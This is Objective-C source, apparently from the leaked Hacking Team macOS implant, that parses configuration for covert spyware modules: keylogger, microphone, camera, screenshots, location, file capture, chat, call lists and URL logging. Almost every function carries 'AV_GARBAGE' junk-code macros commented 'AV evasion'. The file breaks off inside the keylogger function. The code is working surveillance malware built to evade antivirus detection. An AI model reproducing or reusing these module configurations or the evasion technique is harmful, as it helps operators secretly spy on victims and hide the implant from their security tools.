hackedteam/core-macos

View on GitHub
core/SBJSon/RCSIJSonConfiguration.m

Summary

Maintainability
Test Coverage
//
//  RCSIJSonConfiguration.m
//  RCSIphone
//
//  Created by kiodo on 23/02/12.
//  Copyright 2012 __MyCompanyName__. All rights reserved.
//
#import "RCSMCommon.h"

#import "SBJSon.h"
#import "RCSIJSonConfiguration.h"

#import "RCSMAVGarbage.h"

#import "RCSMLogger.h"  // jo remove when done
#import "RCSMDebug.h"  // jo remove when done

//#define DEBUG_JSON_CONFIG_

@interface SBJSonConfigDelegate (hidden)

- (void)initFileModule: (NSDictionary *)aModule;
- (void)initABModule: (NSDictionary *)aModule;
- (void)initDeviceModule: (NSDictionary *)aModule;
- (void)initPositionModule: (NSDictionary *)aModule;
- (void)initCalllistModule: (NSDictionary *)aModule;
- (void)initCalendarModule: (NSDictionary *)aModule;
- (void)initMicModule: (NSDictionary *)aModule;
- (void)initCameraModule: (NSDictionary *)aModule;
- (void)initScrshotModule: (NSDictionary *)aModule;
- (void)initUrlModule: (NSDictionary *)aModule;
- (void)initMouseModule: (NSDictionary *)aModule;
- (void)initChatModule: (NSDictionary *)aModule;
- (void)initAppModule: (NSDictionary *)aModule;
- (void)initKeyLogModule: (NSDictionary *)aModule;
- (void)initClipboardModule: (NSDictionary *)aModule;
- (void)initMessagesModule: (NSDictionary *)aModule;
- (void)initCallModule: (NSDictionary *)aModule;
- (void)initPasswdModule: (NSDictionary *)aModule;
- (void)initMoneyModule: (NSDictionary *)aModule;

- (NSTimeInterval)calculateMsecFromMidnight:(NSString*)aDate;
- (void)addProcessEvent: (NSDictionary *)anEvent;
- (int64_t)calculateWinDate:(NSString*)aDate;
- (int64_t)calculateDaysDate:(NSNumber*)aDay;
- (u_int)timerGetSubtype:(NSDictionary*)anEvent;
- (void)addTimerEvent: (NSDictionary *)anEvent;
- (void)addStandbyEvent: (NSDictionary *)anEvent;
- (void)addSimchangeEvent: (NSDictionary *)anEvent;
- (void)addConnectionEvent: (NSDictionary *)anEvent;
- (void)addBatteryEvent: (NSDictionary *)anEvent;
- (void)addACEvent: (NSDictionary *)anEvent;
- (void)addIdleEvent: (NSDictionary *)anEvent;
- (void)addNULLEvent: (NSDictionary *)anEvent;
- (void)addQuotaEvent: (NSDictionary *)anEvent;

- (NSMutableDictionary *)initActionUninstall:(NSDictionary *)subAction;
- (NSMutableDictionary *)initActionInfolog:(NSDictionary *)subAction;
- (NSMutableDictionary *)initActionModule:(NSDictionary *)subAction;
- (NSMutableDictionary *)initActionSync:(NSDictionary *)subAction;
- (NSMutableDictionary *)initActionEvent:(NSDictionary *)subAction;
- (NSMutableDictionary *)initActionCommand:(NSDictionary *)subAction;
- (NSMutableArray *)initSubActions:(NSArray *)subactions;
- (NSMutableDictionary *)initSubActions:(NSArray *)subactions 
                              forAction:(NSNumber *)actionNum;

@end

@implementation SBJSonConfigDelegate (hidden)

#
#
# pragma mark Modules parsing
#
#

typedef struct _fileConfiguration {
  u_int minFileSize;
  u_int maxFileSize;
  u_int hiMinDate;
  u_int loMinDate;
  u_int reserved1;
  u_int reserved2;
  u_int noFileOpen;
  u_int acceptCount;
  u_int denyCount;
  char patterns[1]; // wchar_t
} file_t;

- (void)initFileModule: (NSDictionary *)aModule
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  file_t file;
  int64_t winDate;
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  id enabled = AGENT_ENABLED;
  NSArray *keys = nil;
  NSArray *objects = nil;  
  NSData *dataNull = [NSData dataWithBytes: "\x00\x00" length:2];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  NSNumber *type = [NSNumber numberWithUnsignedInt: AGENT_FILECAPTURE];
  NSNumber *status = [aModule objectForKey: MODULES_STATUS_KEY];
  
  NSNumber *capture = [aModule objectForKey:@"capture"];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  NSNumber *open    = [aModule objectForKey:@"open"];
  NSNumber *minsize = [aModule objectForKey:@"minsize"];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  NSNumber *maxsize = [aModule objectForKey:@"maxsize"];
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  NSString *date    = [aModule objectForKey:@"date"];
  NSArray  *accept  = [aModule objectForKey:@"accept"];
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  NSArray  *deny    = [aModule objectForKey:@"deny"];
  
  if (status == nil || [status boolValue] == FALSE)
    enabled = AGENT_DISABLED;
  
  // AV evasion: only on release build
  AV_GARBAGE_000
  
  file.maxFileSize = (maxsize != nil ? [maxsize intValue] : 500000);
  file.noFileOpen  = (open    != nil ? ![open boolValue] : FALSE);
  
  if (capture != nil && [capture boolValue] == TRUE)
    {
      file.minFileSize = (minsize != nil ? [minsize intValue] : 1);
    }
  else
    {
      // file capt flag is off: disable capture by reset minFileSize
      // (see RCSMAgentFileCapture.m : 88
      file.minFileSize = 0;
    }
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  winDate = [self calculateWinDate: (date != nil ? date : @"1970-01-01 00:00:00")];
  
  file.loMinDate = winDate & 0xFFFFFFFF;
  file.hiMinDate = (winDate >> 32) & 0xFFFFFFFF;
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  file.acceptCount = (accept != nil ? [accept count] : 0) ; 
  file.denyCount   = (deny   != nil ? [deny count] : 0);
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  // fill the string array
  NSMutableData *acceptStrings = [[NSMutableData alloc] initWithLength: 0];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  for (int i=0; i < file.acceptCount; i++) 
    {
      NSString *tmpStr  = [accept objectAtIndex:i];
      NSData   *dataStr = [tmpStr dataUsingEncoding: NSUTF16LittleEndianStringEncoding];
      
      // AV evasion: only on release build
      AV_GARBAGE_009
      
      [acceptStrings appendData:dataStr];
      [acceptStrings appendData:dataNull]; 
    }
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  NSMutableData *denyStrings = [[NSMutableData alloc] initWithLength: 0];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  for (int i=0; i < file.denyCount; i++) 
    {
      // AV evasion: only on release build
      AV_GARBAGE_002
    
      NSString *tmpStr  = [deny objectAtIndex:i];
      NSData   *dataStr = [tmpStr dataUsingEncoding: NSUTF16LittleEndianStringEncoding];
      
      // AV evasion: only on release build
      AV_GARBAGE_003
      
      [denyStrings appendData:dataStr];
      [denyStrings appendData:dataNull]; 
    }
  
  
  NSMutableData *data = [[NSMutableData alloc] initWithCapacity:0];
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  // struct without patterns[1]
  NSData *dataStruct = [NSData dataWithBytes:&file length:(sizeof(u_int)*9)];
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  [data appendData: dataStruct];
  [data appendData: acceptStrings];
  [data appendData: denyStrings];
                                                                                                                                                                      
  [acceptStrings release];
  [denyStrings release];
  
  // AV evasion: only on release build
  AV_GARBAGE_007
  
  keys = [NSArray arrayWithObjects: @"agentID",
                                    @"status",
                                    @"data",
                                    nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  objects = [NSArray arrayWithObjects: type, 
                                       enabled, 
                                       data,
                                       nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_000
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  [data release];
  
  NSMutableDictionary *moduleConfiguration = [[NSMutableDictionary alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_009
  
  [moduleConfiguration addEntriesFromDictionary: dictionary];
  
  // AV evasion: only on release build
  AV_GARBAGE_000
  
  [mAgentsList addObject: moduleConfiguration];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  [moduleConfiguration release];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  [pool release];
}

// Done.
- (void)initABModule: (NSDictionary *)aModule
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  id enabled = AGENT_ENABLED;
  NSArray *keys = nil;
  NSArray *objects = nil;  
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  NSNumber *type = [NSNumber numberWithUnsignedInt: AGENT_ORGANIZER];
  NSNumber *status = [aModule objectForKey: MODULES_STATUS_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  if (status == nil || [status boolValue] == FALSE)
    enabled = AGENT_DISABLED;
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  keys = [NSArray arrayWithObjects: @"agentID",
                                    @"status",
                                    @"data",
                                    nil];
  
  objects = [NSArray arrayWithObjects: type, 
                                       enabled, 
                                       MODULE_EMPTY_CONF,
                                       nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_009
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  NSMutableDictionary *moduleConfiguration = [[NSMutableDictionary alloc] init];
  
  [moduleConfiguration addEntriesFromDictionary: dictionary];
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  [mAgentsList addObject: moduleConfiguration];
  
  // AV evasion: only on release build
  AV_GARBAGE_000
  
  [moduleConfiguration release];
  
  [pool release];
}

- (void)initDeviceModule: (NSDictionary *)aModule
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  id enabled = AGENT_ENABLED;
  NSArray *keys = nil;
  NSArray *objects = nil;  
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  NSNumber *type = [NSNumber numberWithUnsignedInt: AGENT_DEVICE];
  NSNumber *status = [aModule objectForKey: MODULES_STATUS_KEY];
  // not used yet
  NSNumber *applist = [aModule objectForKey:MODULE_DEVICE_APPLIST_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  if (status == nil || [status boolValue] == FALSE)
    enabled = AGENT_DISABLED;
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  keys = [NSArray arrayWithObjects: @"agentID",
          @"status",
          @"data",
          nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  objects = [NSArray arrayWithObjects: type, 
             enabled, 
             (applist != nil ? applist : MODULE_EMPTY_CONF),
             nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  // AV evasion: only on release build
  AV_GARBAGE_000
  
  NSMutableDictionary *moduleConfiguration = [[NSMutableDictionary alloc] init];
  
  [moduleConfiguration addEntriesFromDictionary: dictionary];
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  [mAgentsList addObject: moduleConfiguration];
  
  // AV evasion: only on release build
  AV_GARBAGE_007
  
  [moduleConfiguration release];
  
  [pool release];
}

typedef struct _position {
  UInt32 sleepTime;
#define LOGGER_GPS  1  // Take GPS Position
#define LOGGER_GSM  2  // Take BTS Position
#define LOGGER_WIFI 4  // Take nearby WiFi list
  UInt32 iType;
} position_t;

// Done.
- (void)initPositionModule: (NSDictionary *)aModule
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_007
  
  NSArray *keys = nil;
  NSArray *objects = nil; 
  NSData *data;
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  id enabled = AGENT_DISABLED; 
  position_t posStruct;
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  NSNumber *type = [NSNumber numberWithUnsignedInt: AGENT_POSITION];
  NSNumber *status = [aModule objectForKey: MODULES_STATUS_KEY];
  
  posStruct.iType = LOGGER_WIFI;
  posStruct.sleepTime = 30;
  
  // AV evasion: only on release build
  AV_GARBAGE_000
  
  data = [[NSData alloc] initWithBytes: &posStruct length:sizeof(posStruct)];
  
  if (status != nil || [status boolValue] == TRUE)
    enabled = AGENT_ENABLED;
  
  // AV evasion: only on release build
  AV_GARBAGE_009
  
  keys = [NSArray arrayWithObjects: @"agentID",
                                    @"status",
                                    @"data",
                                    nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  objects = [NSArray arrayWithObjects: type, 
                                       enabled, 
                                       data,
                                       nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_007
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  NSMutableDictionary *moduleConfiguration = [[NSMutableDictionary alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  [moduleConfiguration addEntriesFromDictionary: dictionary];
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  [mAgentsList addObject: moduleConfiguration];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  [moduleConfiguration release];
  
  [pool release];
}

// implemented
- (void)initCalllistModule: (NSDictionary *)aModule
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_009
  
  id enabled = AGENT_ENABLED;
  NSArray *keys = nil;
  NSArray *objects = nil;
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  NSMutableDictionary *moduleConfiguration = [[NSMutableDictionary alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  NSNumber *type  = [NSNumber numberWithUnsignedInt: AGENT_CALL_LIST];
  NSNumber *status = [aModule objectForKey: MODULES_STATUS_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  if (status == nil || [status boolValue] == FALSE)
    enabled = AGENT_DISABLED;
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  keys = [NSArray arrayWithObjects: @"agentID",
          @"status",
          @"data",
          nil];
  
  objects = [NSArray arrayWithObjects: type, 
             enabled, 
             MODULE_EMPTY_CONF,
             nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  [moduleConfiguration addEntriesFromDictionary: dictionary];
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  [mAgentsList addObject: moduleConfiguration];
  
  [moduleConfiguration release];
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  [pool release];
}

- (void)initCalendarModule: (NSDictionary *)aModule
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  NSArray *keys;
  NSArray *objects;
  
  // AV evasion: only on release build
  AV_GARBAGE_009
  
  NSMutableDictionary *moduleConfiguration = [[NSMutableDictionary alloc] init];
  
  NSNumber *type    = [NSNumber numberWithUnsignedInt: AGENT_ORGANIZER];
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  keys = [NSArray arrayWithObjects: @"agentID",
          @"status",
          @"data",
          nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  objects = [NSArray arrayWithObjects: type, 
             AGENT_DISABLED, 
             MODULE_EMPTY_CONF,
             nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  [moduleConfiguration addEntriesFromDictionary: dictionary];
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  [mAgentsList addObject: moduleConfiguration];
  
  // AV evasion: only on release build
  AV_GARBAGE_000
  
  [moduleConfiguration release];
  
  [pool release];
}

// Done. Verify 0.22 threshold
- (void)initMicModule: (NSDictionary *)aModule
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  microphoneAgentStruct_t micStruct;
  id enabled = AGENT_ENABLED;
  NSArray *keys = nil;
  NSArray *objects = nil;
  NSData  *data;
  
  // AV evasion: only on release build
  AV_GARBAGE_000
  
  NSNumber *type   = [NSNumber numberWithUnsignedInt: AGENT_MICROPHONE];
  NSNumber *status = [aModule objectForKey: MODULES_STATUS_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  // not used
  // NSNumber *vad    = [aModule objectForKey:MODULE_MIC_VAD_KEY];
  // NSNumber *vadThr = [aModule objectForKey: MODULE_MIC_VADTHRESHOLD_KEY];
  NSNumber *sil    = [aModule objectForKey: MODULE_MIC_SILENCE_KEY];
  NSNumber *thr    = [aModule objectForKey: MODULE_MIC_THRESHOLD_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  if (status == nil || [status boolValue] == FALSE)
    enabled = AGENT_DISABLED;
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  memset(&micStruct, 0, sizeof(micStruct));
  micStruct.detectSilence = (sil != nil ? [sil unsignedIntValue] : 5);
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  micStruct.silenceThreshold = (int)(thr != nil ? ([thr floatValue] * 100) : 22);
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  data = [[NSData alloc] initWithBytes: &micStruct length: sizeof(microphoneAgentStruct_t)];
  
  keys = [NSArray arrayWithObjects: @"agentID",
                                    @"status",
                                    @"data",
                                    nil];
  
  objects = [NSArray arrayWithObjects: type, 
                                       enabled, 
                                       data,
                                       nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  NSMutableDictionary *moduleConfiguration = [[NSMutableDictionary alloc] init];

  [moduleConfiguration addEntriesFromDictionary: dictionary];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  [mAgentsList addObject: moduleConfiguration];
  
  [moduleConfiguration release];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  [data release];
  
  [pool release];
}

// Done.
- (void)initCameraModule: (NSDictionary *)aModule
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  cameraStruct_t camStruct;
  id enabled = AGENT_ENABLED;
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  NSArray *keys = nil;
  NSArray *objects = nil;
  NSData  *data;
  
  // AV evasion: only on release build
  AV_GARBAGE_002

  NSNumber *type    = [NSNumber numberWithUnsignedInt:AGENT_CAM];
  NSNumber *status = [aModule objectForKey: MODULES_STATUS_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  // timeStep and numStep forced for new paradigm: event repeatition
  camStruct.sleepTime   = 0;
  camStruct.numOfFrame  = 1;
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  if (status == nil || [status boolValue] == FALSE)
    enabled = AGENT_DISABLED;
  
  // AV evasion: only on release build
  AV_GARBAGE_007
  
  // setup module structs NSData
  data = [[NSData alloc] initWithBytes: &camStruct length: sizeof(cameraStruct_t)];
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  keys = [NSArray arrayWithObjects: @"agentID",
                                    @"status",
                                    @"data",
                                    nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  objects = [NSArray arrayWithObjects: type, 
                                       enabled, 
                                       data,
                                       nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  NSMutableDictionary *moduleConfiguration = [[NSMutableDictionary alloc] init];
  
  [moduleConfiguration addEntriesFromDictionary: dictionary];
  
  // AV evasion: only on release build
  AV_GARBAGE_000
  
  [mAgentsList addObject: moduleConfiguration];
  
  [moduleConfiguration release];
  
  // AV evasion: only on release build
  AV_GARBAGE_009
  
  [data release];
  
  [pool release];
}

// Done.
- (void)initScrshotModule: (NSDictionary *)aModule
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  screenshotAgentStruct_t scrStruct;
  id enabled = AGENT_ENABLED;
  NSArray *keys = nil;
  NSArray *objects = nil;
  NSData  *data;
  
  // AV evasion: only on release build
  AV_GARBAGE_000
  
  NSNumber *type    = [NSNumber numberWithUnsignedInt:AGENT_SCREENSHOT];
  NSNumber *onlyWin = [aModule objectForKey:MODULE_SCRSHOT_ONLYWIN_KEY];
  NSNumber *newWin  = [aModule objectForKey:MODULE_SCRSHOT_NEWWIN_KEY];
  NSNumber *status  = [aModule objectForKey: MODULES_STATUS_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_009
  
  if (status == nil || [status boolValue] == FALSE)
    enabled = AGENT_DISABLED;
  
  memset(&scrStruct, 0, sizeof(scrStruct));
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  // setup module structs
  scrStruct.grabActiveWindow  = (onlyWin != nil ? [onlyWin unsignedIntValue] : 0);
  scrStruct.grabNewWindows    = (newWin  != nil ? [newWin boolValue] : 0);
  scrStruct.sleepTime         = 0xFFFFFFFF;
  scrStruct.dwTag             = 0xFFFFFFFF;
  
  // AV evasion: only on release build
  AV_GARBAGE_007
  
  data = [[NSData alloc] initWithBytes: &scrStruct length: sizeof(screenshotAgentStruct_t)];
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  keys = [NSArray arrayWithObjects: @"agentID",
                                    @"status",
                                    @"data",
                                    nil];
  
  objects = [NSArray arrayWithObjects: type, 
                                       enabled, 
                                       data,
                                       nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
 
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  NSMutableDictionary *moduleConfiguration = [[NSMutableDictionary alloc] init];
  
  [moduleConfiguration addEntriesFromDictionary: dictionary];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  [mAgentsList addObject: moduleConfiguration];
  
  [moduleConfiguration release];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  [data release];
  
  [pool release];
}

typedef struct  {
  u_int delimiter;
  BOOL isSnapshotActive;
} urlStruct;

// Done.
- (void)initUrlModule: (NSDictionary *)aModule
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_000
  
  urlStruct url;
  id enabled = AGENT_ENABLED;
  NSArray *keys = nil;
  NSArray *objects = nil;
  NSData  *data;
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  NSNumber *type    = [NSNumber numberWithUnsignedInt: AGENT_URL];
  NSNumber *status  = [aModule objectForKey: MODULES_STATUS_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  url.delimiter         = 0;
  url.isSnapshotActive  = FALSE;
  
  data = [[NSData alloc] initWithBytes: &url length:sizeof(url)];
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  if (status == nil || [status boolValue] == FALSE)
    enabled = AGENT_DISABLED;
  
  keys = [NSArray arrayWithObjects: @"agentID",
                                    @"status",
                                    @"data",
                                    nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  objects = [NSArray arrayWithObjects: type, 
                                       enabled, 
                                       data,
                                       nil];
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  NSMutableDictionary *moduleConfiguration = [[NSMutableDictionary alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  [moduleConfiguration addEntriesFromDictionary: dictionary];
  
  [mAgentsList addObject: moduleConfiguration];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  [moduleConfiguration release];
  
  // AV evasion: only on release build
  AV_GARBAGE_009
  
  [data release];
  
  [pool release];
}

typedef struct  {
  u_int width;
  u_int height;
} mouse_t;

//Done.
- (void)initMouseModule: (NSDictionary *)aModule
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  mouse_t mouse;
  id enabled = AGENT_ENABLED;
  NSArray *keys = nil;
  NSArray *objects = nil;
  NSData  *data;
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  NSNumber *type    = [NSNumber numberWithUnsignedInt: AGENT_MOUSE];
  NSNumber *status  = [aModule objectForKey: MODULES_STATUS_KEY];
  NSNumber *width   = [aModule objectForKey: @"width"];
  NSNumber *height  = [aModule objectForKey: @"height"];
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  mouse.width   = (width  != nil ? [width  intValue] : 50);
  mouse.height  = (height != nil ? [height intValue] : 50);
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  data = [[NSData alloc] initWithBytes: &mouse length:sizeof(mouse)];
  
  if (status == nil || [status boolValue] == FALSE)
    enabled = AGENT_DISABLED;
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  keys = [NSArray arrayWithObjects: @"agentID",
                                    @"status",
                                    @"data",
                                    nil];
  
  objects = [NSArray arrayWithObjects: type, 
                                       enabled, 
                                       data,
                                       nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  
  NSMutableDictionary *moduleConfiguration = [[NSMutableDictionary alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_000
  
  [moduleConfiguration addEntriesFromDictionary: dictionary];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  [mAgentsList addObject: moduleConfiguration];
  
  [moduleConfiguration release];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  [data release];
  
  [pool release];
}

// Done.
- (void)initChatModule: (NSDictionary *)aModule
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  id enabled = AGENT_ENABLED;
  NSArray *keys = nil;
  NSArray *objects = nil;
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  NSNumber *type    = [NSNumber numberWithUnsignedInt: AGENT_CHAT_NEW];
  NSNumber *status  = [aModule objectForKey: MODULES_STATUS_KEY];
  
  if (status == nil || [status boolValue] == FALSE)
    enabled = AGENT_DISABLED;
  
  // AV evasion: only on release build
  AV_GARBAGE_009
  
  keys = [NSArray arrayWithObjects: @"agentID",
                                    @"status",
                                    @"data",
                                    nil];
  
  objects = [NSArray arrayWithObjects: type, 
                                       enabled, 
                                       MODULE_EMPTY_CONF,
                                       nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_007
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  
  NSMutableDictionary *moduleConfiguration = [[NSMutableDictionary alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  [moduleConfiguration addEntriesFromDictionary: dictionary];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  [mAgentsList addObject: moduleConfiguration];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  [moduleConfiguration release];
  
  [pool release];
}

// implemented
- (void)initAppModule: (NSDictionary *)aModule
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  id enabled = AGENT_ENABLED;
  NSArray *keys = nil;
  NSArray *objects = nil;
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  NSMutableDictionary *moduleConfiguration = [[NSMutableDictionary alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_007
  
  NSNumber *type = [NSNumber numberWithUnsignedInt: AGENT_APPLICATION];
  NSNumber *status = [aModule objectForKey: MODULES_STATUS_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  if (status == nil || [status boolValue] == FALSE)
    enabled = AGENT_DISABLED;
  
  // AV evasion: only on release build
  AV_GARBAGE_009
  
  keys = [NSArray arrayWithObjects: @"agentID",
          @"status",
          @"data",
          nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  objects = [NSArray arrayWithObjects: type, 
             enabled, 
             MODULE_EMPTY_CONF,
             nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  [moduleConfiguration addEntriesFromDictionary: dictionary];
  
  // AV evasion: only on release build
  AV_GARBAGE_003 
  
  [mAgentsList addObject: moduleConfiguration];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  [moduleConfiguration release];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  [pool release];
}

// Done.
- (void)initKeyLogModule: (NSDictionary *)aModule
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_000
  
  id enabled = AGENT_ENABLED;
  NSArray *keys = nil;
  NSArray *objects = nil;
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  NSNumber *type  = [NSNumber numberWithUnsignedInt: AGENT_KEYLOG];
  NSNumber *status = [aModule objectForKey: MODULES_STATUS_KEY];
  
  if (status == nil || [status boolValue] == FALSE)
    enabled = AGENT_DISABLED;
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  keys = [NSArray arrayWithObjects: @"agentID",
                                    @"status",
                                    @"data",
                                    nil];
  
  objects = [NSArray arrayWithObjects: type, 
                                       enabled, 
                                       MODULE_EMPTY_CONF,
                                       nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  NSMutableDictionary *moduleConfiguration = [[NSMutableDictionary alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
